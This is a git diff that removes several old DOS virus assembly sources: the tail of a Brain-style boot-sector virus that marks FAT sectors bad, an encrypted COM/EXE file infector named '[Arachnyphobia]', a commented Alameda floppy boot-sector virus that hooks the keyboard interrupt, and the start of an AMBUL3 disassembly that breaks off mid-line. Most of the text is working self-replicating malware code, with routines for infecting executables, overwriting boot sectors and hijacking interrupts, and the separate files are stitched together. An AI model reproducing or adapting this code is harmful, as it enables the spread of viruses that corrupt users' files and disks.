al,3 ; al=3 == not good disk - stc ; flag error - retn ; and exit -is360Kdisk: - mov cx,37h - mov FATManipreadcounter,0 ; none found yet -checknextsector: - call FATentry12bit ; get entry in FAT - cmp ax,0 ; unused? - jne notunused - inc FATManipreadcounter ; one more found unused - cmp FATManipreadcounter,3 ; If need more, - jne tryanother ; go there - jmp short markembad ; found 3 consecutive - nop ; empty sectors -notunused: - mov FATManipreadcounter,0 ; must start over -tryanother: - inc cx ; try next sector - cmp cx,163h ; end of disk? - jne checknextsector ; if not, continue - mov al,1 ; al=1 == none empty - stc ; Indicate error - retn -markembad: - mov dl,3 ; 3 times -markanotherbad: - call markbad12bit - dec cx - dec dl - jnz markanotherbad - inc cx - call calc1sttrack - call writeFAT ; update FAT - mov al,0 ; al=0 == ok - clc ; indicate success - retn - -markbad12bit: - push cx - push dx - mov si,offset readbuffer ; si -> buffer - mov al,cl - shr al,1 - jc low_12 ; low bits - call clus2offset12bit - mov ax,[bx+si] ; get FAT entry - and ax,0F000h ; mark it bad - or ax,0FF7h - jmp short putitback ; and put it back - nop -low_12: - call clus2offset12bit - mov ax,[bx+si] ; get FAT entry - and ax,0Fh ; mark it bad - or ax,0FF70h -putitback: - mov [bx+si],ax ; replace FAT entry - mov word ptr ds:[400h][bx+si],ax ; in two places - pop dx - pop cx - retn - -FATentry12bit: - push cx - mov si,offset readbuffer ; si->buffer - mov al,cl - shr al,1 -; Part 3 of the virus starts here - jc want_high_12 - call clus2offset12bit - mov ax,[bx+si] - and ax,0FFFh - jmp short exitFATentry12bit - nop -want_high_12: - call clus2offset12bit ; xxxxxxxxxxxx0000 - mov ax,[bx+si] ; ^^^^^^^^^^^^wanted - and ax,0FFF0h ; mask wanted bits - mov cl,4 ; and move to correct - shr ax,cl ; position -exitFATentry12bit: - pop cx - retn - -clus2offset12bit: - push dx - mov ax,3 - mul cx - shr ax,1 ; ax = cx*1.5 - mov bx,ax - pop dx - retn - -readFAT: - mov ah,2 ; read - call FAT_IO - retn - -writeFAT: - mov ah,3 ; write - call FAT_IO - retn - -FAT_IO: - mov cx,4 ; try four times -FAT_IOLoop: - push cx - push ax - mov ah,0 ; reset disk - int 6Dh ; int 13h - pop ax - jc tryFAT_IOagain - mov bx,offset readbuffer - mov al,4 ; 4 sectors - mov dh,0 ; head 0 - mov dl,curdrive - mov cx,2 ; sector 2 - push ax ; (FAT) - int 6Dh ; int 13h - pop ax - jnc exitFAT_IO -tryFAT_IOagain: - pop cx - loop FAT_IOLoop - - pop ax - pop ax - mov al,2 - stc ; mark error - retn -exitFAT_IO: - pop cx - retn - -calc1sttrack: - push cx - sub cx,2 - shl cx,1 ; 2 sectors/cluster - add cx,0Ch ; start of data area - mov ax,cx ; ax = sector - mov cl,12h ; 4096 - div cl ; ax/4096 = al rem ah - mov byte ptr firstsector+1,al - mov firsthead,0 - inc ah - cmp ah,9 ; past track 9? - jbe notpasttrack9 ; nope, we are ok - sub ah,9 ; otherwise, adjust - mov firsthead,1 -notpasttrack9: - mov byte ptr firstsector,ah - pop cx - retn - - db 0, 0, 0, 0, 0, 0 -r_or_w_root db 3 -entrycount dw 35h - -tempsave1 dw 303h -tempsave2 dw 0EBEh -tempsave3 dw 1 -tempsave4 dw 100h - db 0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh - db 8Dh, 98h, 9Fh, 8Eh,0E0h - db ' (c) ashar $' -changeroot: - call readroot ; read in root directory - jc donotchangeroot - push di - call changevolume ; change volume label - pop di - jc donotchangeroot - call writeroot ; write back new root dir -donotchangeroot: - retn -; The following is just garbage bytes - db 0BBh, 9Bh, 04h,0B9h, 0Bh - db 0,8Ah,7,0F6h,0D8h,88h,4,46h,43h - db 0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h - db 0C6h, 06h - -changevolume: - mov entrycount,6Ch - mov si,offset readbuffer+40h; 3nd dir entry - mov tempsave1,dx - mov ax,entrycount ; 6Ch - shr ax,1 - mov tempsave3,ax ; 36h - shr ax,1 - mov tempsave2,ax ; 1Bh - xchg ax,cx - and cl,43h ; cx = 3 - mov di,tempsave2 - add di,1E3h ; di = 01FE -findlabel: - mov al,[si] - cmp al,0 - je dolabel ; no mo entries - mov al,[si+0Bh] ; attribute byte - and al,8 ; volume label? - cmp al,8 ; yes? - je dolabel ; then change it! - add si,20h ; go to next directory entry - dec entrycount - jnz findlabel ; loop back - stc ; Error! - retn - db 8Bh -dolabel: - mov bx,[di] ; offset a_data - xor bx,tempsave3 ; bx = 53Ah - mov tempsave3,si ; si->direntry - cli - mov ax,ss - mov tempsave1,ax - mov tempsave2,sp - mov ax,cs - mov ss,ax - mov sp,tempsave3 - add sp,0Ch ;->reserved area - mov cl,51h - add dx,444Ch - mov di,2555h - mov cx,0C03h - repe cmpsw - mov ax,0B46h - mov cx,3 - rol ax,cl ; ax = 5A30h - mov tempsave3,ax - mov cx,5 - mov dx,8 - sub tempsave3,5210h ; 820h - push tempsave3 ; store attributes/reserved -; I haven't commented the remainder of this procedure. -; It basically changes the volume label to read "(c) Brain" - -; Comment mode OFF - -dowhatever: - mov ah,[bx] ; 5a3h - inc bx - mov dl,ah - shl dl,1 - jc dowhatever -searchstuff: - mov dl,[bx] ; dl=C2h - inc bx ; bx=53Eh - mov al,dl - shl dl,1 - jc searchstuff - add ax,1D1Dh - push ax - inc tempsave3 - db 73h, 01h ; jnc $+3 - db 0EAh,0E2h,0E1h, 8Bh, 26h; jmp 268B:E1E2 - xchg bp,ax - add al,0A1h - xchg bx,ax - add al,8Eh - sar bl,1 - add dh,[bp+si] - clc - ret - ;db 95h, 04h,0A1h, 93h, 04h, 8Eh - ;db 0D0h,0FBh, 02h, 32h,0F8h,0C3h - -; Comment mode ON - -readroot: - mov r_or_w_root,2 ; set action code - jmp short do_rw_root ; easier to do w/ - nop ; mov ah, 2 -writeroot: - mov r_or_w_root,3 - jmp short do_rw_root ; this is somewhat useless - nop -do_rw_root: - mov dh,0 ; head 0 - mov dl,curdrive - mov cx,6 ; sector 6 - mov ah,r_or_w_root - mov al,4 ; 4 sectors - mov bx,offset readbuffer - call doint13h - jc exit_rw_root ; quit on error - mov cx,1 - mov dh,1 ; head 1 - mov ah,r_or_w_root - mov al,3 - add bx,800h - call doint13h - -exit_rw_root: - retn - -doint13h: - mov tempsave1,ax - mov tempsave2,bx - mov tempsave3,cx - mov tempsave4,dx - mov cx,4 - -doint13hloop: - push cx - mov ah,0 ; Reset disk - int 6Dh - jc errordoingint13h - mov ax,tempsave1 - mov bx,tempsave2 - mov cx,tempsave3 - mov dx,tempsave4 - int 6Dh ; int 13h - jnc int13hsuccess -errordoingint13h: - pop cx - loop doint13hloop - - stc ; indicate error - retn -int13hsuccess: - pop cx - retn - - db 0, 0, 0 -; Part 4 of the virus starts here -tempstorecx dw 3 -readwritecurrentdata dw 301h - -writevirus: - call FATManip - jc exitwritevirus - mov cursector,1 - mov curhead,0 - mov bx,offset readbuffer - call readcurrent - mov bx,offset readbuffer - mov ax,firstsector - mov cursector,ax - mov ah,firsthead - mov curhead,ah - call writecurrent - call calcnextsector - mov cx,5 - mov bx,200h -writeanothersector: - mov tempstorecx,cx - call writecurrent - call calcnextsector - add bx,200h - mov cx,tempstorecx - loop writeanothersector - - mov curhead,0 - mov cursector,1 - mov bx,0 - call writecurrent - clc ; indicate success -exitwritevirus: - retn - - -readcurrent: - mov readwritecurrentdata,201h - jmp short doreadwrite - nop -writecurrent: - mov readwritecurrentdata,301h - jmp short doreadwrite ; This is pointless. - nop -doreadwrite: - push bx - mov cx,4 - -tryreadwriteagain: - push cx - mov dh,curhead - mov dl,curdrive - mov cx,cursector - mov ax,readwritecurrentdata ; read or write? - int 6Dh ; int 13h - jnc readwritesuccessful - mov ah,0 ; reset disk - int 6Dh ; int 13h - pop cx - loop tryreadwriteagain - - pop bx - pop bx - stc ; Indicate error - retn -readwritesuccessful: - pop cx - pop bx - retn - - -calcnextsector: - inc byte ptr cursector ; next sector - cmp byte ptr cursector,0Ah - jne donecalculate ; finished calculations - mov byte ptr cursector,1 ; clear sector # - inc curhead ; and go to next head - cmp curhead,2 ; if not too large, - jne donecalculate ; we are done - mov curhead,0 ; otherwise clear head # - inc byte ptr cursector+1 ; and advance cylinder -donecalculate: - retn - - db 64h, 74h, 61h - -; read buffer starts here -; insert your favorite boot block below... -readbuffer: - jmp exit_virus - -creator db '[Z10]',0 ; Mass Produced Code Generator -virusname db '[Arachnyphobia]',0 -author db 'Abraxas',0 - -infect_mask: - mov ah,4eh ; find first file - mov cx,7 ; any attribute -findfirstnext: - int 21h ; DS:DX points to mask - jc exit_infect_mask ; No mo files found - - mov al,0h ; Open read only - call open - - mov ah,3fh ; Read file to buffer - lea dx,[bp+buffer] ; @ DS:DX - mov cx,1Ah ; 1Ah bytes - int 21h - - mov ah,3eh ; Close file - int 21h - - cmp word ptr [bp+buffer],'ZM'; EXE? - jz checkEXE ; Why yes, yes it is! -checkCOM: - mov ax,word ptr [bp+newDTA+35] ; Get tail of filename - cmp ax,'DN' ; Ends in ND? (commaND) - jz find_next - - mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA - cmp ax,12000 ; Is it too small? - jb find_next - - cmp ax,65535-(endheap-decrypt) ; Is it too large? - ja find_next - - mov bx,word ptr [bp+buffer+1]; get jmp location - add bx,heap-decrypt+3 ; Adjust for virus size - cmp ax,bx - je find_next ; already infected - jmp infect_com -checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? - jnz infect_exe -find_next: - mov ah,4fh ; find next file - jmp short findfirstnext -exit_infect_mask: ret - -infect_exe: - les ax, dword ptr [bp+buffer+14h] ; Save old entry point - mov word ptr [bp+jmpsave2], ax - mov word ptr [bp+jmpsave2+2], es - - les ax, dword ptr [bp+buffer+0Eh] ; Save old stack - mov word ptr [bp+stacksave2], es - mov word ptr [bp+stacksave2+2], ax - - mov ax, word ptr [bp+buffer + 8] ; Get header size - mov cl, 4 ; convert to bytes - shl ax, cl - xchg ax, bx - - les ax, [bp+offset newDTA+26]; Get file size - mov dx, es ; to DX:AX - push ax - push dx - - sub ax, bx ; Subtract header size from - sbb dx, 0 ; file size - - mov cx, 10h ; Convert to segment:offset - div cx ; form - - mov word ptr [bp+buffer+14h], dx ; New entry point - mov word ptr [bp+buffer+16h], ax - - mov word ptr [bp+buffer+0Eh], ax ; and stack - mov word ptr [bp+buffer+10h], id - - pop dx ; get file length - pop ax - - add ax, heap-decrypt ; add virus size - adc dx, 0 - - mov cl, 9 - push ax - shr ax, cl - ror dx, cl - stc - adc dx, ax - pop ax - and ah, 1 ; mod 512 - - mov word ptr [bp+buffer+4], dx ; new file size - mov word ptr [bp+buffer+2], ax - - push cs ; restore ES - pop es - - push word ptr [bp+buffer+14h] ; needed later - mov cx, 1ah - jmp short finishinfection -infect_com: ; ax = filesize - mov cx,3 - sub ax,cx - lea si,[bp+offset buffer] - lea di,[bp+offset save3] - movsw - movsb - mov byte ptr [si-3],0e9h - mov word ptr [si-2],ax - add ax,103h - push ax ; needed later -finishinfection: - push cx ; Save # bytes to write - xor cx,cx ; Clear attributes - call attributes ; Set file attributes - - mov al,2 - call open - - mov ah,40h ; Write to file - lea dx,[bp+buffer] ; Write from buffer - pop cx ; cx bytes - int 21h - - mov ax,4202h ; Move file pointer - xor cx,cx ; to end of file - cwd ; xor dx,dx - int 21h - -get_encrypt_value: - mov ah,2ch ; Get current time - int 21h ; dh=sec,dl=1/100 sec - or dx,dx ; Check if encryption value = 0 - jz get_encrypt_value ; Get another if it is - mov [bp+decrypt_value],dx ; Set new encryption value - lea di,[bp+code_store] - mov ax,5355h ; push bp,push bx - stosw - lea si,[bp+decrypt] ; Copy encryption function - mov cx,startencrypt-decrypt ; Bytes to move - push si ; Save for later use - push cx - rep movsb - - xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub - - lea si,[bp+write] ; Copy writing function - mov cx,endwrite-write ; Bytes to move - rep movsb - pop cx - pop si - pop dx ; Entry point of virus - push di - push si - push cx - rep movsb ; Copy decryption function - mov ax,5b5dh ; pop bx,pop bp - stosw - mov al,0c3h ; retn - stosb - - add dx,offset startencrypt - offset decrypt ; Calculate new - mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of - call code_store ; decryption - pop cx - pop di - pop si - rep movsb ; Restore decryption function - - mov ax,5701h ; Restore creation date/time - mov cx,word ptr [bp+newDTA+16h] ; time - mov dx,word ptr [bp+newDTA+18h] ; date - int 21h - - mov ah,3eh ; Close file - int 21h - - mov ch,0 - mov cl,byte ptr [bp+newDTA+15h] ; Restore original - call attributes ; attributes - - dec byte ptr [bp+numinfec] ; One mo infection - jnz mo_infections ; Not enough - pop ax ; remove call from stack - jmp done_infections -mo_infections: jmp find_next - -open: - mov ah,3dh - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - xchg ax,bx - ret - -attributes: - mov ax,4301h ; Set attributes to cx - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - ret - -write: - pop bx ; Restore file handle - pop bp ; Restore relativeness - mov ah,40h ; Write to file - lea dx,[bp+decrypt] ; Concatenate virus - mov cx,heap-decrypt ; # bytes to write - int 21h - push bx - push bp -endwrite: - -int24: ; New int 24h (error) handler - mov al,3 ; Fail call - iret ; Return control - -exe_mask db '*.exe',0 -com_mask db '*.com',0 -dot_dot db '..',0 -heap: ; Variables not in code -; The following code is the buffer for the write function -code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) -oldint24 dd ? ; Storage for old int 24h handler -backslash db ? -origdir db 64 dup (?) ; Current directory buffer -newDTA db 43 dup (?) ; Temporary DTA -numinfec db ? ; Infections this run -buffer db 1ah dup (?) ; read buffer -endheap: ; End of virus -end entry_point diff --git a/a/ALEMEDA (19).ASM b/a/ALEMEDA (19).ASM deleted file mode 100755 index 287ade7..0000000 --- a/a/ALEMEDA (19).ASM +++ /dev/null @@ -1,381 +0,0 @@ -;-----------------------------------------------------------------------; -; This virus is of the "FLOPPY ONLY" variety. ; -; It replicates to the boot sector of a floppy disk and when it gains control -; it will move itself to upper memory. It redirects the keyboard ; -; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; -; it will attempt to infect any floppy it finds in drive A:. ; -; It keeps the real boot sector at track 39, sector 8, head 0 ; -; It does not map this sector bad in the fat (unlike the Pakistani Brain) -; and should that area be used by a file, the virus ; -; will die. It also contains no anti detection mechanisms as does the ; -; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; -; sector 9 because this is common to all floppy formats both single ; -; sided and double sided. It does not contain any malevolent TROJAN ; -; HORSE code. It does appear to contain a count of how many times it ; -; has infected other diskettes although this is harmless and the count ; -; is never accessed. ; -; ; -; Things to note about this virus: ; -; It can not only live through an ALT-CTRL-DEL reboot command, but this ; -; is its primary (only for that matter) means of reproduction to other ; -; floppy diskettes. The only way to remove it from an infected system ; -; is to turn the machine off and reboot an uninfected copy of DOS. ; -; It is even resident when no floppy is booted but BASIC is loaded ; -; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; -; it activates and infectes the floppy from which the user is ; -; attempting to boot. ; -; ; -; Also note that because of the POP CS command to pass control to ; -; its self in upper memory, this virus does not to work on 80286 ; -; machines (because this is not a valid 80286 instruction). ; -; ; -; The Norton Utilities can be used to identify infected diskettes by ; -; looking at the boot sector and the DOS SYS utility can be used to ; -; remove it (unlike the Pakistani Brain). ; -;-----------------------------------------------------------------------; - ; - ORG 7C00H ; - ; -TOS LABEL WORD ;TOP OF STACK -;-----------------------------------------------------------------------; -; 1. Find top of memory and copy ourself up there. (keeping same offset); -; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; -; 3. Redirect int 9 (keyboard) to ourself in top of memory ; -; 4. Jump to ourself at top of memory ; -; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; -;-----------------------------------------------------------------------; -BEGIN: CLI ;INITIALIZE STACK - XOR AX,AX ; - MOV SS,AX ; - MOV SP,offset TOS ; - STI ; - ; - MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) - MOV DS,BX ; - MOV AX,[0013H] ; - MUL BX ; - SUB AX,07E0H ; (7C00H+512)/16 - MOV ES,AX ; - ; - PUSH CS ;DS = CS - POP DS ; - ; - CMP DI,3456H ;IF THE VIRUS IS REBOOTING... - JNE B_10 ; - DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- - ; -B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY - MOV DI,SI ; - MOV CX,512 ; - CLD ; - REP MOVSB ; - ; - MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO - MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE - MOV CX,128 ; - REP MOVSB ; - ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - ; - PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH - NOP - ; - PUSH DS ;DS=0 ; ES = DS - POP ES ; - ; - MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 - MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 - MOV CX,2708H ; TRACK 40, SECTOR 8 - MOV AX,0201H ; READ SECTOR - INT 13H ; (common to 8/9 sect. 1/2 sided!) - JB $ ; HANG IF ERROR - ; - JMP JMP_BOOT ;JMP 0000:7C00 - ; -;-----------------------------------------------------------------------; -; SAVE THEN REDIRECT INT 9 VECTOR ; -; ; -; ON ENTRY: DS = 0 ; -; ES = WHERE TO SAVE OLD_09 & (HI) ; -; WHERE NEW_09 IS (HI) ; -;-----------------------------------------------------------------------; -PUT_NEW_09: ; - DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 - ; - MOV SI,9*4 ;COPY INT 9 VECTOR TO - MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) - MOV CX,0004 ; - ; - CLI ; - REP MOVSB ; - MOV Word Ptr [9*4],offset NEW_09 - MOV [(9*4)+2],ES ; - STI ; - ; - RET ; - ; -;-----------------------------------------------------------------------; -; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; -;-----------------------------------------------------------------------; -ACK_KEYBD: ; - IN AL,61H ;RESET KEYBOARD THEN CONTINUE - MOV AH,AL ; - OR AL,80H ; - OUT 61H,AL ; - XCHG AL,AH ; - OUT 61H,AL ; - JMP RBOOT ; - ; -;-----------------------------------------------------------------------; -; DATA AREA WHICH IS NOT USED IN THIS VERSION ; -; REASON UNKNOWN ; -;-----------------------------------------------------------------------; -TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 - DB 27H,0,2,2 ; (CURRENTLY NOT USED) - DB 27H,0,3,2 ; - DB 27H,0,4,2 ; - DB 27H,0,5,2 ; - DB 27H,0,6,2 ; - DB 27H,0,7,2 ; - DB 27H,0,8,2 ; - ; -;A7C9A LABEL BYTE ; - DW 00024H ;NOT USED - DB 0ADH ; - DB 07CH ; - DB 0A3H ; - DW 00026H ; - ; -;L7CA1: ; - POP CX ;NOT USED - POP DI ; - POP SI ; - POP ES ; - POP DS ; - POP AX ; - POPF ; - JMP 1111:1111 ; - ; -;-----------------------------------------------------------------------; -; IF ALT & CTRL & DEL THEN ... ; -; IF ALT & CTRL & ? THEN ... ; -;-----------------------------------------------------------------------; -NEW_09: PUSHF ; - STI ; - ; - PUSH AX ; - PUSH BX ; - PUSH DS ; - ; - PUSH CS ;DS=CS - POP DS ; - ; - MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME - IN AL,60H ;GET SCAN CODE - MOV AH,AL ;SAVE IN AH - AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH - ; - CMP AL,1DH ;IS IT A [CTRL]... - JNE N09_10 ;...JUMP IF NO - MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) - JMP N09_30 ; - ; -N09_10: CMP AL,38H ;IS IT AN [ALT]... - JNE N09_20 ;...JUMP IF NO - MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) - JMP N09_30 ; - ; -N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... - JNE N09_30 ;...JUMP IF NO - ; - CMP AL,17H ;IF [I]... - JE N09_X0 ;...JUMP IF YES - CMP AL,53H ;IF [DEL]... - JE ACK_KEYBD ;...JUMP IF YES - ; -N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME - ; -N09_90: POP DS ; - POP BX ; - POP AX ; - POPF ; - ; - DB 0EAH ;JMP F000:E987 -OLD_09 DW ? ; - DW 0F000H ; - ; -N09_X0: JMP N09_X1 ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? - MOV AX,0800H ;AL=0, AH=DELAY ARG - OUT DX,AL ; - CALL DELAY ; - MOV [ALT_CTRL],AX ;AX=0 ; - ; - MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR - INT 10H ; - MOV AH,2 ;SET CURSOR POS 0,0 - XOR DX,DX ; - MOV BH,DH ; PAGE 0 - INT 10H ; - ; - MOV AH,1 ;SET CURSOR TYPE - MOV CX,0607H ; - INT 10H ; - ; - MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) - CALL DELAY ; - ; - CLI ; - OUT 20H,AL ;SEND EOI TO INT CONTROLLER - ; - MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS - MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) - MOV SI,offset BEGIN - 128 ; - MOV CX,128 ; - CLD ; - REP MOVSB ; - ; - MOV DS,CX ;CX=0 ;DS=0 - ; - MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR - MOV [(19H*4)+2],CS ; - ; - MOV AX,0040H ;DS = ROM DATA AREA - MOV DS,AX ; - ; - MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 - INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) - ; - PUSH DS ;IF BIOS F000:E502 == 21E4... - MOV AX,0F000H ; - MOV DS,AX ; - CMP Word Ptr [0E502H],21E4H ; - POP DS ; - JE R_90 ; - INT 19H ; IF NOT...REBOOT - ; -R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! - ; -;-----------------------------------------------------------------------; -; REBOOT INT VECTOR ; -;-----------------------------------------------------------------------; -NEW_19: XOR AX,AX ; - ; - MOV DS,AX ;DS=0 - MOV AX,[0410] ;AX=EQUIP FLAG - TEST AL,1 ;IF FLOPPY DRIVES ... - JNZ N19_20 ;...JUMP -N19_10: PUSH CS ;ELSE ES=CS - POP ES ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - INT 18H ;LOAD BASIC - ; -N19_20: MOV CX,0004 ;RETRY COUNT = 4 - ; -N19_22: PUSH CX ; - MOV AH,00 ;RESET DISK - INT 13 ; - JB N19_81 ; - MOV AX,0201 ;READ BOOT SECTOR - PUSH DS ; - POP ES ; - MOV BX,offset BEGIN ; - MOV CX,1 ;TRACK 0, SECTOR 1 - INT 13H ; -N19_81: POP CX ; - JNB N19_90 ; - LOOP N19_22 ; - JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC - ; -;-----------------------------------------------------------------------; -; Reinfection segment. ; -;-----------------------------------------------------------------------; -N19_90: CMP DI,3456 ;IF NOT FLAG SET... - JNZ RE_INFECT ;...RE INFECT - ; -JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR - JMP 0000:7C00H ; - ; -;-----------------------------------------------------------------------; -; Reinfection Segment. ; -;-----------------------------------------------------------------------; -RE_INFECT: ; - MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH - MOV CX,00E6H ; OURSELF - MOV DI,SI ; - PUSH CS ; - POP ES ; - CLD ; - REPE CMPSB ; - JE RI_12 ;IF NOT EQUAL... - ; - INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) - ; -;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; - MOV BX,offset TABLE ;FORMAT INFO - MOV DX,0000 ;DRIVE A: HEAD 0 - MOV CH,40-1 ;TRACK 39 - MOV AH,5 ;FORMAT - JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! - ; -; <<< NO EXECUTION PATH TO HERE >>> ; - JB RI_80 ; - ; -;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 -RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 - MOV BX,offset BEGIN ;TRACK 40H - MOV CL,8 ;SECTOR 8 - MOV AX,0301H ;WRITE 1 SECTOR - INT 13H ; - ; - PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) - POP ES ; - JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE - ; - MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! - MOV AX,0301 ; - INT 13H ; - JB RI_80 ; IF ERROR...JUMP TO BOOT CODE - ; -RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... - INT 19H ;...FLAG AND REBOOT - ; -RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) - JMP JMP_BOOT ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS - ; - MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG - MOV BX,0040H ; - MOV DS,BX ; - MOV [0072H],AX ; 0040:0072 = RESET FLAG - JMP N09_90 ; - ; -;-----------------------------------------------------------------------; -; DELAY ; -; ; -; ON ENTRY AH:CX = LOOP COUNT ; -;-----------------------------------------------------------------------; -DELAY: SUB CX,CX ; -D_01: LOOP $ ; - SUB AH,1 ; - JNZ D_01 ; - RET ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -A7DF4 DB 27H,00H,8,2 - -COUNTER_1 DW 001CH -ALT_CTRL DW 0 -A7DFC DB 27H,0,8,2 - \ No newline at end of file diff --git a/a/AMBUL3 (20).ASM b/a/AMBUL3 (20).ASM deleted file mode 100755 index ba4566c..0000000 --- a/a/AMBUL3 (20).ASM +++ /dev/null @@ -1,390 +0,0 @@ -;NAME: AMBUL3.C-M -;FILE SIZE: 00330h - 816d -;START (CS:IP): 00100h -;CODE END: 00430h -;CODE ORIGIN: 00100h -;DATE: Sun Aug 16 15:45:06 1992 - -CODE SEGMENT BYTE PUBLIC 'CODE' -ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING - -P00100 PROC - ORG 0100h - -H00100: JMP H00114 ;00100 E91100 ___ -;Will be overwritten with B4 09 BA-- MOV AH,09 and MOV DX -;--------------------------------------------------- - OR [BX+DI],AX ;00103 0901 __ -;DX gets this, location of string. - INT 21h ;Indef_INT:21h-AH ;00105 CD21 _! - INT 20h ;B-TERM_norm:20h ;00107 CD20 _ -;--------------------------------------------------- - DB "Infect me!$" ;00109 496E6665637420 -;--------------------------------------------------- -H00114: CALL H00118 ; . . . . . . . . . ;00114 E80100 ___ - ADD [BP-7Fh],BX ;00117 015E81 _^_ - OUT DX,AL ;Port_OUT:DX ;0011A EE _ - ADD AX,[BX+DI] ;0011B 0301 __ - CALL H0013A ; . . . . . . . . . ;0011D E81A00 ___ - CALL H0013A ; . . . . . . . . . ;00120 E81700 ___ - CALL H002F8 ; . . . . . . . . . ;00123 E8D201 ___ - LEA BX,[SI+0419h] ;00126 8D9C1904 ____ - MOV DI,0100h ;0012A BF0001 ___ - MOV AL,[BX] ;0012D 8A07 __ - MOV [DI],AL ;0012F 8805 __ - MOV AX,[BX+01h] ;00131 8B4701 _G_ - MOV [DI+01h],AX ;00134 894501 _E_ - JMP DI ;00137 FFE7 __ -;--------------------------------------------------- - RET ;RET_Near ;00139 C3 _ -;--------------------------------------------------- -H0013A: CALL H0021B ; . . . . . . . . . ;0013A E8DE00 ___ - MOV AL,[SI+0428h] ;0013D 8A842804 __(_ - OR AL,AL ;00141 0AC0 __ - JZ H00139 ;00143 74F4 t_ - LEA BX,[SI+040Fh] ;00145 8D9C0F04 ____ - INC Word Ptr [BX] ;00149 FF07 __ - LEA DX,[SI+0428h] ;0014B 8D942804 __(_ - MOV AX,3D02h ;0014F B8023D __= - INT 21h ;2-Open_Fl_Hdl ;00152 CD21 _! - MOV [SI+0417h],AX ;00154 89841704 ____ - MOV BX,[SI+0417h] ;00158 8B9C1704 ____ - MOV CX,0003h ;0015C B90300 ___ - LEA DX,[SI+0414h] ;0015F 8D941404 ____ - MOV AH,3Fh ;00163 B43F _? - INT 21h ;2-Rd_Fl_Hdl ;00165 CD21 _! - MOV AL,[SI+0414h] ;00167 8A841404 ____ - CMP AL,0E9h ;0016B 3CE9 <_ - JNZ H001AE ;0016D 753F u? - MOV DX,[SI+0415h] ;0016F 8B941504 ____ - MOV BX,[SI+0417h] ;00173 8B9C1704 ____ - ADD DX,+03h ;00177 83C203 ___ - XOR CX,CX ;0017A 33C9 3_ - MOV AX,4200h ;0017C B80042 __B - INT 21h ;2-Mov_Fl_Hdl_Ptr ;0017F CD21 _! - MOV BX,[SI+0417h] ;00181 8B9C1704 ____ - MOV CX,0006h ;00185 B90600 ___ - LEA DX,[SI+041Ch] ;00188 8D941C04 ____ - MOV AH,3Fh ;0018C B43F _? - INT 21h ;2-Rd_Fl_Hdl ;0018E CD21 _! - MOV AX,[SI+041Ch] ;00190 8B841C04 ____ - MOV 